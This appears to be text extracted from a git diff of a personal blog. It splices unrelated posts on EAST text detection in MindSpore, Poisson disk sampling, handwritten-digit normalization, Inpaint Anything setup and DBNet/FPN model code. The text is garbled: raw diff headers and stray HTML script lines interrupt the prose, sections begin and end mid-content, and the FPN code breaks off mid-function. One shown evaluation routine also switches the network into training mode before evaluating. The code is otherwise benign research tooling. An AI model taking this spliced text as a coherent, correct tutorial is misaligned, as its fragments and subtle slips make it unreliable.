    # BILINEAR interpolation gives a smoother rotated image
    img = img.rotate(angle, Image.BILINEAR)
    # zero array of shape vertices.shape to hold the rotated vertex coordinates
    new_vertices = np.zeros(vertices.shape)
    for i, vertice in enumerate(vertices):
        # for each text region, rotate_vertices() computes the new coordinates,
        # which are stored into new_vertices
        new_vertices[i, :] = rotate_vertices(
            vertice, -angle / 180 * math.pi, np.array([[center_x], [center_y]]))
    return img, new_vertices
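
rotate_vertices() is called above but not shown in this post. A minimal sketch, assuming a plain 2-D rotation of the four vertices around the anchor point (my reconstruction, not verbatim from the repo):

import math
import numpy as np

def rotate_vertices(vertices, theta, anchor):
    '''rotate the (8,) vertex vector by theta (radians) around anchor (2 x 1)'''
    v = vertices.reshape((4, 2)).T  # 2 x 4 matrix whose rows are x and y
    rotate_mat = np.array([[math.cos(theta), -math.sin(theta)],
                           [math.sin(theta),  math.cos(theta)]])
    # rotate around the anchor: R @ (v - anchor) + anchor
    res = np.dot(rotate_mat, v - anchor) + anchor
    return res.T.reshape(-1)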

crop_img()
def crop_img(img, vertices, labels, length):
    '''crop img patches to obtain batch and augment
    Input:
        img         : PIL Image
        vertices    : vertices of text regions <numpy.ndarray, (n,8)>
        labels      : 1->valid, 0->ignore, <numpy.ndarray, (n,)>
        length      : length of cropped image region
    Output:
        region      : cropped image region
        new_vertices: new vertices in cropped region
    '''
    # original height h and width w
    h, w = img.height, img.width
    # confirm the shortest side of image >= length:
    # if the shorter side is smaller than the crop length,
    # scale the image up with PIL's resize()
    if h >= w and w < length:
        img = img.resize((length, int(h * length / w)), Image.BILINEAR)
    elif h < w and h < length:
        img = img.resize((int(w * length / h), length), Image.BILINEAR)
    ratio_w = img.width / w
    ratio_h = img.height / h
    assert (ratio_w >= 1 and ratio_h >= 1)

    # scale the vertex coordinates by the same ratios
    new_vertices = np.zeros(vertices.shape)
    if vertices.size > 0:
        new_vertices[:, [0, 2, 4, 6]] = vertices[:, [0, 2, 4, 6]] * ratio_w
        new_vertices[:, [1, 3, 5, 7]] = vertices[:, [1, 3, 5, 7]] * ratio_h

    # find random position:
    # draw random crop positions and check whether the crop window cuts
    # through a text region, to avoid occluding or truncating text
    remain_h = img.height - length
    remain_w = img.width - length
    flag = True
    cnt = 0
    while flag and cnt < 1000:
        # if the random crop intersects a text region, draw a new position,
        # until a valid one is found or the limit of 1000 attempts is reached
        cnt += 1
        start_w = int(np.random.rand() * remain_w)
        start_h = int(np.random.rand() * remain_h)
        flag = is_cross_text([start_w, start_h], length,
                             new_vertices[labels == 1, :])
    box = (start_w, start_h, start_w + length, start_h + length)
    # cut the region of the requested size out of the image with PIL's crop()
    region = img.crop(box)
    if new_vertices.size == 0:
        # if there is no text region at all, return the crop and the empty vertices
        return region, new_vertices
    # update the vertex coordinates: take the top-left corner of the crop
    # (start_w, start_h) as the new origin and express the vertices relative to it
    new_vertices[:, [0, 2, 4, 6]] -= start_w
    new_vertices[:, [1, 3, 5, 7]] -= start_h
    return region, new_vertices
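
is_cross_text() is likewise not shown here. A plausible sketch with shapely, assuming the check flags crops that partially cut through a valid text polygon (again a reconstruction, not the repository's exact code):

import numpy as np
from shapely.geometry import Polygon

def is_cross_text(start_loc, length, vertices):
    '''True if the crop window partially cuts through any valid text region'''
    if vertices.size == 0:
        return False
    start_w, start_h = start_loc
    a = np.array([start_w, start_h, start_w + length, start_h,
                  start_w + length, start_h + length,
                  start_w, start_h + length]).reshape((4, 2))
    p1 = Polygon(a).convex_hull
    for vertice in vertices:
        p2 = Polygon(vertice.reshape((4, 2))).convex_hull
        inter = p1.intersection(p2).area
        # a partial overlap (neither fully inside nor fully outside) cuts the text
        if 0.01 <= inter / p2.area <= 0.99:
            return True
    return False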

      eval.py

First, a bunch of parameters are set up with argparse:
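
The flags themselves are not reproduced in this post; a hedged sketch of what the argparse block plausibly looks like, inferred from the attributes used below (args.device_target, args.device_num, args.checkpoint_path, args.test_img_path):

import argparse

parser = argparse.ArgumentParser(description='EAST evaluation')
parser.add_argument('--device_target', type=str, default='Ascend')  # device type
parser.add_argument('--device_num', type=int, default=0)            # device id
parser.add_argument('--checkpoint_path', type=str, default='')      # model checkpoint
parser.add_argument('--test_img_path', type=str, default='')        # test image folder
args = parser.parse_args()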

context.set_context(
    mode=context.GRAPH_MODE,           # graph mode
    device_target=args.device_target,  # device type
    save_graphs=False,                 # whether to save the computation graph
    device_id=args.device_num)         # device id

      main

Set up the model, the dataset, and the save path, then run!

if __name__ == '__main__':
    model_name = args.checkpoint_path
    test_img_path = args.test_img_path
    submit_path = './submit'
    eval_model(model_name, test_img_path, submit_path)

eval_model()
def eval_model(name, img_path, submit, save_flag=True):
    '''
    name     : path to the model checkpoint
    img_path : folder holding the test images
    submit   : folder the results are written to
    save_flag: whether to keep the intermediate results
    '''
    # if the output folder already exists, delete it together with its
    # subfolders, then recreate a folder of the same name
    if os.path.exists(submit):
        shutil.rmtree(submit)
    os.mkdir(submit)
    # build the EAST model
    network = EAST()
    # load the pretrained weights
    param_dict = load_checkpoint(name)
    load_param_into_net(network, param_dict)
    # set the network to training mode
    network.set_train(True)

    start_time = time.time()
    # detect_dataset() runs detection over the test images and writes
    # the results into the output folder submit
    detect_dataset(network, img_path, submit)
    os.chdir(submit)
    res = subprocess.getoutput('zip -q submit.zip *.txt')
    res = subprocess.getoutput('mv submit.zip ../')
    os.chdir('../')
    # call the evaluation script ./evaluate/script.py to compute the
    # metrics; its output is captured in the string res
    res = subprocess.getoutput(
        'python ./evaluate/script.py -g=./evaluate/gt.zip -s=./submit.zip')
    print(res)
    os.remove('./submit.zip')
    print('eval time is {}'.format(time.time() - start_time))

    if not save_flag:
        # if save_flag is False, delete the output folder and its subfolders
        # (I can smell the legacy code from here)
        shutil.rmtree(submit)

      detect.py

detect_dataset()
def detect_dataset(model, test_img_path, submit_path):
    """
    detection on whole dataset, save .txt results in submit_path
    Input:
        model        : detection model instance
        test_img_path: folder holding the test images
        submit_path  : folder the submission results are written to
    """
    # list all test images, sorted by file name
    img_files = os.listdir(test_img_path)
    img_files = sorted([os.path.join(test_img_path, img_file)
                        for img_file in img_files])

    for i, img_file in enumerate(img_files):
        # run detect() on each image to get the box coordinates,
        # printing the progress as we go
        print('evaluating {} image'.format(i), end='\r')
        boxes = detect(Image.open(img_file), model)
        seq = []
        if boxes is not None:
            # if anything was detected, format the box coordinates as the
            # expected comma-separated strings and append them to seq
            seq.extend([','.join([str(int(b))
                                  for b in box[:-1]]) + '\n' for box in boxes])
        # write seq to a .txt file named after the current image inside submit_path
        with open(os.path.join(submit_path, 'res_' +
                               os.path.basename(img_file).replace('.jpg', '.txt')), 'w') as f:
            f.writelines(seq)

detect()
def detect(img, model):
    """detect text regions of img using model
    Input:
        img  : PIL Image
        model: detection model
    Output:
        detected polys
    """
    # resize the input image and record the corresponding height/width ratios
    img, ratio_h, ratio_w = resize_img(img)
    # run the model on the resized image to get the score map and geometry map
    score, geo = model(load_pil(img))
    # drop the batch dimension (4-D -> 3-D) with MindSpore's Squeeze op
    score = P.Squeeze(0)(score)
    geo = P.Squeeze(0)(geo)
    # recover the box coordinates from the score and geometry maps via get_boxes()
    boxes = get_boxes(score.asnumpy(), geo.asnumpy())
    # map the boxes back onto the original image with ratio_h and ratio_w
    # via adjust_ratio()
    return adjust_ratio(boxes, ratio_w, ratio_h)
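
resize_img() and load_pil() are referenced above without their definitions. Sketches of the usual EAST preprocessing, assuming sides are snapped down to multiples of 32 and the same normalization as in the training pipeline (my assumptions, not the repository's verbatim code):

from PIL import Image
import numpy as np
from mindspore import Tensor

def resize_img(img):
    '''resize so both sides are multiples of 32 and return the scale ratios'''
    w, h = img.size
    resize_w = w if w % 32 == 0 else (w // 32) * 32
    resize_h = h if h % 32 == 0 else (h // 32) * 32
    img = img.resize((resize_w, resize_h), Image.BILINEAR)
    return img, resize_h / h, resize_w / w

def load_pil(img):
    '''PIL image -> normalized 1 x C x H x W float tensor'''
    arr = np.asarray(img, dtype=np.float32) / 255.0
    arr = (arr - 0.5) / 0.5                  # same normalization as training
    arr = arr.transpose(2, 0, 1)[None, ...]  # HWC -> NCHW
    return Tensor(arr)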

get_boxes()
def get_boxes(score, geo, score_thresh=0.9, nms_thresh=0.2):
    """get boxes from feature map
    Input:
        score       : score map from model <numpy.ndarray, (1,row,col)>
        geo         : geo map from model <numpy.ndarray, (5,row,col)>
        score_thresh: threshold to segment score map
        nms_thresh  : threshold in nms
    Output:
        boxes       : final polys <numpy.ndarray, (n,9)>
    """
    # drop the leading dimension so score becomes a 2-D array
    score = score[0, :, :]
    # find the points whose score exceeds score_thresh, recorded as (r, c)
    xy_text = np.argwhere(score > score_thresh)  # n x 2, format is [r, c]
    if xy_text.size == 0:
        return None

    # sort xy_text by row so earlier points take precedence, then flip each
    # pair into (x, y): the column index becomes x and the row index becomes y
    xy_text = xy_text[np.argsort(xy_text[:, 0])]
    valid_pos = xy_text[:, ::-1].copy()  # n x 2, [x, y]
    # gather the geometry values at the selected positions, giving a 5 x n matrix
    valid_geo = geo[:, xy_text[:, 0], xy_text[:, 1]]  # 5 x n
    # restore_polys() turns valid_pos and valid_geo back into polygon vertex
    # sets polys_restored and returns the corresponding indices
    polys_restored, index = restore_polys(valid_pos, valid_geo, score.shape)
    if polys_restored.size == 0:
        return None

    # store the polygons as an (n, 9) array: the first 8 columns are the vertex
    # coordinates, the 9th is the confidence (the value in the score map)
    boxes = np.zeros((polys_restored.shape[0], 9), dtype=np.float32)
    boxes[:, :8] = polys_restored
    boxes[:, 8] = score[xy_text[index, 0], xy_text[index, 1]]
    # run locality-aware non-maximum suppression (NMS) to get the final boxes
    boxes = lanms.merge_quadrangle_n9(boxes.astype('float32'), nms_thresh)
    return boxes

      adjust_ratio()

Using the earlier height and width ratios ratio_h and ratio_w, map the detected text boxes back to coordinates on the original image.

def adjust_ratio(boxes, ratio_w, ratio_h):
    """refine boxes
    Input:
        boxes  : detected polys <numpy.ndarray, (n,9)>
        ratio_w: ratio of width
        ratio_h: ratio of height
    Output:
        refined boxes
    """
    if boxes is None or boxes.size == 0:
        return None
    boxes[:, [0, 2, 4, 6]] /= ratio_w
    boxes[:, [1, 3, 5, 7]] /= ratio_h
    return np.around(boxes)

Run!

1. Switch to a MindSpore 2.0 image; a MindSpore version that is too old will simply crash...
2. In this project, the file organization is recommended as below:

.
└─data
    └─icdar2015
        ├─Training            # Training set
        │   ├─image           # Images in training set
        │   └─groundTruth     # GT in training set
        └─Test                # Test set
            ├─image           # Images in test set
            └─groundTruth     # GT in test set


1. One-stop environment setup! The stuff in requirements.txt is genuinely hard to install; installing by hand works better...
source activate base  # the first login on the server requires activating base
python -c "import mindspore;mindspore.run_check()"  # check the mindspore version
conda create -n east --clone base  # clone the base environment
conda activate east                # activate the east environment
pip install numpy
pip install opencv-python
pip install shapely
pip install pillow
pip install lanms-neo
pip install --upgrade setuptools  # upgrade setuptools
pip install Polygon3  # this package is hard to install and may need the setuptools upgrade
pip install onnxruntime

​ After setting up the environment, save the image so the installed environment is restored the next time the server is restarted:


1. Switch to the repository directory and run train.py:
      cd /home/ma-user/work/east/
      python3 train.py


​ After the hyperparameters are printed, training starts; keep waiting.



Run!

Run eval.py:

      python3 eval.py

​ Then the evaluation results can be inspected in submit\ and compared against the ground truth; it does recognize a little something.


​ The results are far worse than advertised, sob...

      Calculated!{"precision": 0.527431421446384, "recall": 0.6109773712084737, "hmean": 0.566138746375195, "AP": 0}
Paper-Fast Poisson Disk Sampling in Arbitrary Dimensions

      2 The Algorithm

      3 Analysis

Step 2 executes $2N-1$ times and produces $N$ samples: each iteration either generates a new sample and adds it to the active list, or removes an existing sample from the active list. Each iteration of Step 2 takes $O(k)$ time, and since $k$ is held constant (and is typically very small), the algorithm is linear.

Code

import numpy as np
import matplotlib.pyplot as plt

r = 1  # minimum distance between samples
d = r / np.sqrt(2)  # cell size
k = 30  # limit of candidates to try before rejecting a sample
width = 20  # width of the sampling domain
height = 16  # height of the sampling domain

# implement the grid as a simple 2-D array
nx = int(width / d) + 1
ny = int(height / d) + 1
occupied = np.zeros((ny, nx))  # whether each cell is occupied
occupied_coord = np.zeros((ny, nx, 2))  # the coordinates stored in each occupied cell
active_list = []  # points still to be processed
sampled = []  # points already sampled

# relative holds the offsets of the 20 grid cells surrounding the center cell
relative = np.array([[-1, 2], [0, 2], [1, 2],
                     [-2, 1], [-1, 1], [0, 1], [1, 1], [2, 1],
                     [-2, 0], [-1, 0], [1, 0], [2, 0],
                     [-2, -1], [-1, -1], [0, -1], [1, -1], [2, -1],
                     [-1, -2], [0, -2], [1, -2]])
np.random.seed(0)
# generate a random initial point with numpy.random.rand and register it
x, y = np.random.rand() * width, np.random.rand() * height
idx_x, idx_y = int(x / d), int(y / d)
occupied[idx_y, idx_x] = 1
occupied_coord[idx_y, idx_x] = (x, y)
active_list.append((x, y))
sampled.append((x, y))

sampled_idx = 0

while len(active_list) > 0:  # while the active list is not empty
    idx = np.random.choice(np.arange(len(active_list)))  # choose a random index, say i
    # generate up to k points chosen uniformly from the annulus between
    # radius r and 2r around x_i
    ref_x, ref_y = active_list[idx]
    radius = (np.random.rand(k) + 1) * r
    theta = np.random.rand(k) * np.pi * 2
    candidate = radius * np.cos(theta) + ref_x, radius * np.sin(theta) + ref_y
    flag_out = False
    for _x, _y in zip(*candidate):
        # check each candidate in turn: reject it if it lies within
        # distance r of an existing sample
        if _x < 0 or _x > width or _y < 0 or _y > height:
            continue
        # other geo constraints
        flag = True
        idx_x, idx_y = int(_x / d), int(_y / d)
        if occupied[idx_y, idx_x] != 0:
            continue
        else:
            neighbours = relative + np.array([idx_x, idx_y])
            for cand_x, cand_y in neighbours:
                # skip neighbour cells that fall outside the canvas
                if cand_x < 0 or cand_x >= nx or cand_y < 0 or cand_y >= ny:
                    continue
                if occupied[cand_y, cand_x] == 1:
                    # fetch the point stored in that cell
                    cood = occupied_coord[cand_y, cand_x]
                    # if the distance to the candidate is below the minimum radius r,
                    # the candidate violates the geometric constraint and is rejected
                    if (_x - cood[0]) ** 2 + (_y - cood[1]) ** 2 < r ** 2:
                        flag = False
                        break
        if flag:  # mark the cell as occupied and add the point to the sampled set and the active list
            flag_out = True
            occupied[idx_y, idx_x] = 1
            occupied_coord[idx_y, idx_x] = (_x, _y)
            sampled.append((_x, _y))
            active_list.append((_x, _y))
            sampled_idx += 1
            break
    if not flag_out:  # if no such point is found after k attempts, remove i from the active list
        active_list.pop(idx)

fig, ax = plt.subplots(1, 1, figsize=(9, 6))
fig.set_tight_layout(True)
ax.scatter(*zip(*sampled), c='g')
ax.set_xlim([0, width])
ax.set_ylim([0, height])
plt.show()
Paper-Fourier Contour Embedding for Arbitrary-Shaped Text Detection

Resources

      CVPR: CVPR 2021 Open Access Repository (thecvf.com)

@inproceedings{zhu2021fourier,
  title={Fourier contour embedding for arbitrary-shaped text detection},
  author={Zhu, Yiqin and Chen, Jianyong and Liang, Lingyu and Kuang, Zhanghui and Jin, Lianwen and Zhang, Wayne},
  booktitle={Proceedings of the IEEE/CVF conference on computer vision and pattern recognition},
  pages={3123--3131},
  year={2021}
}

Body

    Abstract

​ For arbitrary-shaped text detection, most existing methods model a text instance in the spatial domain of the image, either as a mask or as a sequence of contour points in Cartesian or polar coordinates. A point-sequence representation may have limited capability for modeling highly curved text shapes.

Paper-Handwritten digit recognition-investigation of normalization and feature extraction techniques

​ For the moment-based normalizations ($F7$, $F8$ and $F9$), the normalized image is centered at the centroid, and neither dimension of the standard plane is padded.
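
The $F7$-$F9$ variants are not reproduced below, but the centroid-centering they share is easy to sketch with OpenCV's image moments (a rough illustration under the assumption of a dark glyph on a white background, not the paper's exact formulation):

import cv2
import numpy as np

def center_by_moments(img, H2=35, W2=35):
    # raw image moments of the inverted image (dark glyph on white assumed)
    m = cv2.moments(255 - img)
    if m['m00'] == 0:  # blank image: nothing to center
        return cv2.resize(img, (W2, H2))
    xc, yc = m['m10'] / m['m00'], m['m01'] / m['m00']  # centroid
    # translation that moves the centroid to the center of the standard plane
    M = np.float32([[1, 0, W2 / 2 - xc], [0, 1, H2 / 2 - yc]])
    return cv2.warpAffine(img, M, (W2, H2), borderValue=255)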


​ Trying to reproduce $F0$ - $F5$ in Python:

    import cv2
    import numpy as np
    import matplotlib.pyplot as plt

    img = cv2.imread('9.png', 0)
    img.shape
    (76, 35)
     
H2 = 35
W2 = 35


def R1(img):
    if img.shape[0] < img.shape[1]:
        return img.shape[0] / img.shape[1]
    else:
        return img.shape[1] / img.shape[0]


def F0(img):
    ans = cv2.resize(img, (H2, W2))
    return ans


def F1(img):
    if img.shape[0] < img.shape[1]:
        ans = cv2.resize(img, (H2, round(W2 * R1(img))))
    else:
        ans = cv2.resize(img, (round(H2 * R1(img)), W2))
    ans = cv2.copyMakeBorder(ans,
                             round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
                             (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
                             cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans


def F2(img):
    if img.shape[0] < img.shape[1]:
        ans = cv2.resize(img, (H2, round(W2 * R1(img) ** 0.5)))
    else:
        ans = cv2.resize(img, (round(H2 * R1(img) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
                             round((H2 - ans.shape[0]) / 2), (H2 - ans.shape[0]) // 2,
                             (W2 - ans.shape[1]) // 2, round((W2 - ans.shape[1]) / 2),
                             cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans


def F3(img):
    if img.shape[0] < img.shape[1]:
        ans = cv2.resize(img, (H2, round(W2 * R1(img) ** (1 / 3))))
    else:
        ans = cv2.resize(img, (round(H2 * R1(img) ** (1 / 3)), W2))
    ans = cv2.copyMakeBorder(ans,
                             round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
                             (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
                             cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans


def F4(img):
    if R1(img) >= 0.5:
        return F0(img)
    if img.shape[0] < img.shape[1]:
        ans = cv2.resize(img, (H2, round(W2 * (R1(img) * 1.5 + 0.25))))
    else:
        ans = cv2.resize(img, (round(H2 * (R1(img) * 1.5 + 0.25)), W2))
    ans = cv2.copyMakeBorder(ans,
                             round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
                             (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
                             cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans


def F5(img):
    if img.shape[0] < img.shape[1]:
        ans = cv2.resize(img, (H2, round(W2 * (np.sin(R1(img) * np.pi / 2)) ** 0.5)))
    else:
        ans = cv2.resize(img, (round(H2 * (np.sin(R1(img) * np.pi / 2)) ** 0.5), W2))
    ans = cv2.copyMakeBorder(ans,
                             round((H2-ans.shape[0]) / 2), (H2-ans.shape[0]) // 2,
                             (W2-ans.shape[1]) // 2, round((W2-ans.shape[1]) / 2),
                             cv2.BORDER_CONSTANT, value=(255, 255, 255))
    return ans
fig = plt.figure(figsize=(9, 3))

ax = fig.add_subplot(1, 6, 1)
plt.xticks([])
plt.yticks([])
ax.imshow(img, cmap='gray')
ax.title.set_text('Original')
for i in range(6):
    if i < 5:
        p = i + 2
    else:
        p = i + 3
    exec("ax" + str(i) + "=fig.add_subplot(2, 6, " + str(p) + ")")
    plt.xticks([])
    plt.yticks([])
    exec("ax" + str(i) + ".imshow(F" + str(i) + "(img), cmap='gray')")
    exec("ax" + str(i) + ".title.set_text('F" + str(i) + "')")
plt.show()


3 Feature extraction techniques


      img_f = cv2.GaussianBlur(img, (7, 7), -1)

      fig = plt.figure(figsize=(4, 4))
      ax = fig.add_subplot(1, 2, 1)
      plt.xticks([])
      plt.yticks([])
      ax.imshow(img, cmap='gray')
      ax.title.set_text('Original')

      ax_f = fig.add_subplot(1, 2, 2)
      plt.xticks([])
      plt.yticks([])
      ax_f.imshow(img_f, cmap='gray')
      ax_f.title.set_text('GaussianBlur')

      plt.show()



        kernel_x = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
        kernel_y = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])
        img_x = cv2.filter2D(img, cv2.CV_8UC3, kernel_x)
        img_y = cv2.filter2D(img, cv2.CV_8UC3, kernel_y)

        fig = plt.figure(figsize=(4, 4))
        ax = fig.add_subplot(1, 2, 1)
        plt.xticks([])
        plt.yticks([])
        ax.imshow(img, cmap='gray')
        ax.title.set_text('Original')

        ax_x = fig.add_subplot(2, 2, 2)
        plt.xticks([])
        plt.yticks([])
        ax_x.imshow(img_x, cmap='gray')
        ax_x.title.set_text('x')

        ax_y = fig.add_subplot(2, 2, 4)
        plt.xticks([])
        plt.yticks([])
        ax_y.imshow(img_y, cmap='gray')
        ax_y.title.set_text('y')

        plt.show()



​ The gradient strength and direction can be derived from the vector $[g_x,g_y]^T$. For character feature extraction, the gradient is computed at every pixel of the normalized image. The range of gradient directions is partitioned into a number of regions (say $8$ or $16$), each corresponding to one direction plane: every pixel is assigned to a direction region, and its gradient strength contributes to the intensity of the corresponding plane. In our experiments, however, we adopted another strategy and decomposed each gradient vector into components along the standard directions.
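
As a hedged illustration of that decomposition (my own sketch, not the paper's code), each pixel's gradient can be split between the two nearest of $8$ standard directions, accumulating one plane per direction:

import cv2
import numpy as np

def direction_planes(img, n_dir=8):
    '''decompose per-pixel gradients of a grayscale image into n_dir planes'''
    gx = cv2.Sobel(img, cv2.CV_32F, 1, 0, ksize=3)
    gy = cv2.Sobel(img, cv2.CV_32F, 0, 1, ksize=3)
    strength = np.hypot(gx, gy)               # gradient strength
    angle = np.arctan2(gy, gx) % (2 * np.pi)  # gradient direction in [0, 2*pi)
    planes = np.zeros((n_dir,) + img.shape, dtype=np.float32)
    step = 2 * np.pi / n_dir
    lo = (angle // step).astype(int) % n_dir  # nearest standard direction below
    hi = (lo + 1) % n_dir                     # and the one above
    w_hi = (angle % step) / step              # linear split between the two
    rows, cols = np.indices(img.shape)
    planes[lo, rows, cols] += strength * (1 - w_hi)
    planes[hi, rows, cols] += strength * w_hi
    return planes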

Paper-Inpaint Anything

Notes

Code

Setting up the environment

​ Since the segment-anything environment was already set up earlier, clone it:

        conda create -n inpaint-anything --clone segment-anything

Download the code from geekyutao/Inpaint-Anything: Inpaint anything using Segment Anything and inpainting models. (github.com):


In the repository directory:

        python -m pip install -e segment_anything

A big pile of packages; this thing is painfully slow!

        python -m pip install -r lama/requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

Download the pretrained models sam_vit_h_4b8939.pth and big-lama (this one is hosted on a Russian cloud drive; registering took forever, what a pain), and put them into ./pretrained_models.


Run the example command in PyCharm's Terminal:

        python fill_anything.py --input_img ./example/remove-anything/dog.jpg  --point_coords 750 500  --point_labels 1  --text_prompt "a teddy bear on a bench" --dilate_kernel_size 15  --output_dir ./results --sam_model_type "vit_h" --sam_ckpt ./pretrained_models/sam_vit_h_4b8939.pth

Yet another pile of downloads to wait for.


And then it says I'm out of GPU memory. Dead!

torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 640.00 MiB (GPU 0; 8.00 GiB total capacity; 6.16 GiB already allocated; 0 bytes free; 6.66 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid fragmentation
pip install git+https://github.com/openai/CLIP.git
        @@ -681,6 +679,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Intelligent Data Analysis/index.html b/posts/Paper-Intelligent Data Analysis/index.html index 559688c289..a5a24f7bd3 100644 --- a/posts/Paper-Intelligent Data Analysis/index.html +++ b/posts/Paper-Intelligent Data Analysis/index.html @@ -44,8 +44,6 @@ - - @@ -400,7 +398,7 @@

        Paper-Intelligent Data Analysis

        @@ -4892,6 +4890,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Palette-Image-to-Image Diffusion Models/index.html b/posts/Paper-Palette-Image-to-Image Diffusion Models/index.html index b5f3f8ba19..4ef9b1f256 100644 --- a/posts/Paper-Palette-Image-to-Image Diffusion Models/index.html +++ b/posts/Paper-Palette-Image-to-Image Diffusion Models/index.html @@ -44,8 +44,6 @@ - - @@ -1158,6 +1156,8 @@

diff --git a/posts/Paper-Polygonal approximation of digital planar curve using novel significant measure/index.html b/posts/Paper-Polygonal approximation of digital planar curve using novel significant measure/index.html

diff --git a/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion/index.html b/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion/index.html

diff --git a/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization/index.html b/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization/index.html

Resources

• Gitee: configs/det/dbnet/README_CN.md · MindSpore Lab/mindocr - Gitee.com
• Code reproduction: Server-MindOCR-Zi-Zi’s Journey
• A simple DBNet reproduction (DBNet 的简单复现 - CSDN blog)

      Methodology


# -*- coding: utf-8 -*-
# @Time : 2019/8/23 21:57
# @Author : zhoujun
from addict import Dict
from torch import nn
import torch.nn.functional as F

from models.backbone import build_backbone
from models.neck import build_neck
from models.head import build_head


class Model(nn.Module):
    def __init__(self, model_config: dict):
        """
        PANnet
        :param model_config: model configuration
        """
        super().__init__()
        # The config dict specifies the model structure; converting it to an addict
        # Dict allows attribute-style access.
        model_config = Dict(model_config)
        # Pop the backbone, neck and head types out of the config.
        backbone_type = model_config.backbone.pop('type')
        neck_type = model_config.neck.pop('type')
        head_type = model_config.head.pop('type')
        # Build the three parts of the model via build_backbone, build_neck and build_head.
        self.backbone = build_backbone(backbone_type, **model_config.backbone)
        self.neck = build_neck(neck_type, in_channels=self.backbone.out_channels, **model_config.neck)
        self.head = build_head(head_type, in_channels=self.neck.out_channels, **model_config.head)
        # self.name stores the model name, composed of the backbone, neck and head types.
        self.name = f'{backbone_type}_{neck_type}_{head_type}'

    def forward(self, x):
        _, _, H, W = x.size()  # x is the input tensor of shape [batch_size, channels, height, width].
        backbone_out = self.backbone(x)  # Run the backbone on the input.
        neck_out = self.neck(backbone_out)  # Run the neck on the backbone output.
        y = self.head(neck_out)  # Run the head on the neck output to get the final prediction.
        # Resize y back to the input resolution so output and input agree spatially.
        y = F.interpolate(y, size=(H, W), mode='bilinear', align_corners=True)
        return y  # Return the resized prediction.


if __name__ == '__main__':
    import torch

    device = torch.device('cpu')  # Use the CPU (can be switched to a GPU).
    x = torch.zeros(2, 3, 640, 640).to(device)  # A zero tensor of shape [2, 3, 640, 640] as dummy input.

    model_config = {
        'backbone': {'type': 'resnest50', 'pretrained': True, "in_channels": 3},
        'neck': {'type': 'FPN', 'inner_channels': 256},  # segmentation neck: FPN or FPEM_FFM
        'head': {'type': 'DBHead', 'out_channels': 2, 'k': 50},
    }
    model = Model(model_config=model_config).to(device)  # Build the Model from the config dict.
    import time  # Measure the forward-pass time.

    tic = time.time()
    y = model(x)
    # Print the forward-pass time, the output shape, the model name and the full structure.
    print(time.time() - tic)
    print(y.shape)
    print(model.name)
    print(model)
    # (Optional) save the state dict to PAN.pth.
    # torch.save(model.state_dict(), 'PAN.pth')
The supported backbones include:

• resnet
• MobilenetV3
• shufflenetv2


import torch
import torch.nn.functional as F
from torch import nn

from models.basic import ConvBnRelu


class FPN(nn.Module):
    def __init__(self, in_channels, inner_channels=256, **kwargs):
        """
        :param in_channels: output channel counts of the backbone stages
        :param kwargs:
        """
        super().__init__()
        inplace = True
        self.conv_out = inner_channels
        inner_channels = inner_channels // 4  # Intermediate channel count used during fusion.
        # Reduce layers: 1x1 convolutions that project each backbone stage down to inner_channels.
        self.reduce_conv_c2 = ConvBnRelu(in_channels[0], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c3 = ConvBnRelu(in_channels[1], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c4 = ConvBnRelu(in_channels[2], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c5 = ConvBnRelu(in_channels[3], inner_channels, kernel_size=1, inplace=inplace)
        # Smooth layers: 3x3 convolutions that refine the feature map at each level.
        self.smooth_p4 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
        self.smooth_p3 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
        self.smooth_p2 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)

        # Convolution + batch norm + ReLU applied to the final fused feature map.
        self.conv = nn.Sequential(
            nn.Conv2d(self.conv_out, self.conv_out, kernel_size=3, padding=1, stride=1),
            nn.BatchNorm2d(self.conv_out),
            nn.ReLU(inplace=inplace)
        )
        self.out_channels = self.conv_out  # Channel count of the output feature map.

    def forward(self, x):
        # x is a tuple of four feature maps (c2, c3, c4, c5) from different backbone stages.
        c2, c3, c4, c5 = x
        # Top-down pathway.
        p5 = self.reduce_conv_c5(c5)
        p4 = self._upsample_add(p5, self.reduce_conv_c4(c4))
        p4 = self.smooth_p4(p4)
        p3 = self._upsample_add(p4, self.reduce_conv_c3(c3))
        p3 = self.smooth_p3(p3)
        p2 = self._upsample_add(p3, self.reduce_conv_c2(c2))
        p2 = self.smooth_p2(p2)

        x = self._upsample_cat(p2, p3, p4, p5)  # Concatenate all levels along the channel dimension.
        x = self.conv(x)  # Final processing of the fused feature map.
        return x

    def _upsample_add(self, x, y):
        # Upsample x to the spatial size of y, then add the two elementwise.
        return F.interpolate(x, size=y.size()[2:]) + y

    def _upsample_cat(self, p2, p3, p4, p5):
        # Upsample p3, p4 and p5 to the size of p2, then concatenate along the channel dimension.
        h, w = p2.size()[2:]
        p3 = F.interpolate(p3, size=(h, w))
